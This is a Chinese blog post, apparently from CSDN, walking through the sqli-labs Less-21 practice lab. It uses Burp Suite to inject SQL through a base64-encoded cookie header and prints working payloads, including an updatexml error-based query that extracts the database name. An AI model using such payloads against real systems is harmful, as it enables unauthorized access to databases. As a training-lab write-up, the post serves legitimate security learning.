sqli-labs/less-21;header头注入;burpsuite抓包;mysql注入;

最新推荐文章于 2024-01-11 11:45:00 发布
最新推荐文章于 2024-01-11 11:45:00 发布
阅读量366 收藏
点赞数
文章标签: java servlet jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaochenhang/article/details/126409850
版权

1、输入正确账号登陆

 

 

2、这里使用burpsuite进行抓包

 3、这里使用打算使用cookie头注入,因为它页面有cookie回显;

看到uname编码方式中有%感觉有点像url;

 

发现是base64编码

 

这里选择base64编码; 

 

 

 

4、这里闭合失败

发现提示要使用   ')   进行闭合;

    

5、这里使用base64编码: 

admin') and 1=1 -- +

YWRtaW4nKSBhbmQgMT0xIC0tICs=

 

 闭合成功

6、查一下数据库

这里利用报错查询:updatexml

admin') and updatexml(1,concat(0x7e,database(),0x7e),1) -- +

YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSAtLSAr

 

 

7、后面表名字段数据就随便爆了,如果不知道,可以看我之前的文章;

小乘杭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
请求注入神器 -- BurpHeaderHelper(Burpsuite、bp插件)
墨痕诉清风的博客
01-17 2129
1、加载插件: Extender -> Burp Extensions -> Add -> Select File... -> Next -> BurpHeaderHelper-xxx.jar。),通过一些浏览器的插件可以去除这些信息,但是实际的情况是总会有这些冒出来(可能是插件不给力或者我使用方式不对?BurpHeaderHelper是基于Burpsuite的插件,通过自定义规则的来对Http请求进行增删改操作。在服务器上查看对应的请求,可以看到相应的几个信息都被去除。
CustomHeader:此Burp Suite扩展允许您自定义标,并将新标放入HTTP REQUEST BurpSuite(扫描仪,入侵者,中继器,代理历史记录)
03-08
自定义标题-自动向整个BurpSuite HTTP请求添加新标题。 下载版本: 此Burp Suite扩展允许您自定义标,并将新标放入HTTP REQUEST BurpSuite(扫描仪,入侵者,中继器,代理历史记录),还可以选择要自定义的HTTP VERB。 用法 便于使用 ! :) 别忘了点击保存按钮! 变更日志 2019年10月24日-v1.0 首次公开发行 谢谢 瓦吉罗-https: 丹尼·努格拉哈(Denny Nugraha)-https:
burpsuite 自定义插件-java 版本
freshfox的博客
05-21 1078
package burp; import java.awt.Color; import java.awt.Component; import java.awt.FlowLayout; import java.awt.event.FocusEvent; import java.awt.event.FocusListener; import java.awt.event.ItemEvent; im...
第一天 Burps uite 简单使用
代码审计
03-02 2456
第1章 1.1 RUL统一资源定位符 Sheme : 协议 http htttps 443 Login:passwod: 用户名 密码 不安全 @ddress:port:访问的地址 www.bing.com 443 Path/to resource:路径 知名协议 存在默认的端口 1.2 OSI七层模型 Tcp 和udp 都是传输层的协议 http : 是应用层的协议 http 超文本传输协议 http协议的特征? 无状态的协议 cookie存储在浏览器端 session存储在服务器端 1.
【SQL注入-12】http注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2386
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Header注入
笔墨稠思
11-06 2004
靶场 当我们使用get/post注入,发现特殊的符号或单词被设置了检测,被办了,我们可以尝试检测是否存在Header注入 什么是Header注入? 我们网页,在向服务器发送请求时,会携带一些信息 如图所示,Request Headers 这部分都是请求,这里面有一部分记录的是浏览器与服务器的链接状态,还有一些是记录我们的用户信息 例如:User-Agent 记录了我们当前操作系统,浏览器内核版本 Referer记录了我们的来源 当然,请求中内容不仅仅是这些,还可能存在cookie http-X-Fo
使用Burpsuite对http部进行分析
weixin_52347768的博客
04-14 3322
POST与GET的区别 GET: GET把参数含在URL中 GET请求在URL中传送的参数是有长度限制的 GET产生一个TCP数据,浏览器会把http header和data一并发送出去,服务器响应200(返回数据) GET会被浏览器进行主动缓存 POST: POST通过request body传递参数 POST请求在URL中传送的参数是没有长度限制的 POST产生两个TCP数据,浏览器先发送header,服务器响应100 contin...
burpsuite暴力破解登录页面(请求含有user_token)
weixin_43779071的博客
07-27 8305
注:此篇基于DVWA的high安全等级下的brute force模式。 当前请求的user_token的值,来自上一条请求返回响应里已生成的user_token的值。(第一次获取的user_token除外) 打开DVWA,设置安全等级为high,进入brute force模式,设置好浏览器和burpsuite代理,关闭burpsuite的请求数据截断: 已知用户名为admin,密码为te...
burpsuite-intruder部分使用教程
小白的劝退之路
10-14 3355
一、简介 Burp Intruder是一个强大的工具,用于自动对Web应用程序自定义的攻击,Burp Intruder 是高度可配置的,并被用来在广范围内进行自动化攻击。你可以使用 Burp Intruder 方便地执行许多任务,括枚举标识符,获取有用数据,漏洞模糊测试。合适的攻击类型取决于应用程序的情况,可能括:缺陷测试:SQL 注入,跨站点脚本,缓冲区溢出,路径遍历;暴力攻击认证系统;枚举;操纵参数;拖出隐藏的内容和功能;会话令牌测序和会话劫持;数据挖掘;并发攻击;应用层的拒绝服务式攻击。...
修改 http/https header
sunguannan的博客
03-23 1821
1. chrome 扩展  "smart header" https://chrome.google.com/webstore/detail/smart-header/ncgnmldbedmbadafajhjeahmafdmggbp?hl=zh-CN 2. chrome扩展   “modify-http-headers” https://yunpan.cn/cYNpxA5PsQhwB (提取
BurpSuite 基本使用之修改请求
白帽渗透笔记的博客
07-09 5169
Burp Suite 是用于攻击web 应用程序的集成平台,含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 安装 需要先安装 Java 环境,安装好后直接使用 java -jar 命令运行 BurpSuite 的 jar 即可,公众号后台回复 “burp” 即可获取BurpSuite 的 jar 。 代理 使用之前,需要先设置代理,推荐使用谷歌浏览器,推荐使用代理插件.
Burpsuite拦截并修改request/response
热门推荐
liuno0的博客
09-04 1万+
Burpsuite拦截并修改request/response Burpsuite设置HTTP/HTTPS代理并 设置完代理,你可以作为一个观察者查看所有经过Burpsuite代理的Http报文,但是往往实际的场景中你还需要拦截报文进行修改。 1.拦截修改request 首先进入Proxy-Options-Intercept Client Requests设置request拦截的规则...
黑客工具之BurpSuite详解
最新发布
瓦罗兰特顶级C位的博客
01-11 1841
BurpSuite是用于攻击Web应用程序的集合平台,含了许多工具。BurpSuite为这些工具设计了许多接口,以加快攻击应用程序的过程。
sqli-labs/Less-28
01-09
sqli-labs是一个用于学习和实践SQL注入的实验平台。Less-28是其中的一个实验,它是基于GET请求的盲注注入漏洞。在这个实验中,我们需要利用字符串单引号和括号来进行注入。 具体步骤如下: 1. 打开sqli-labs实验...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值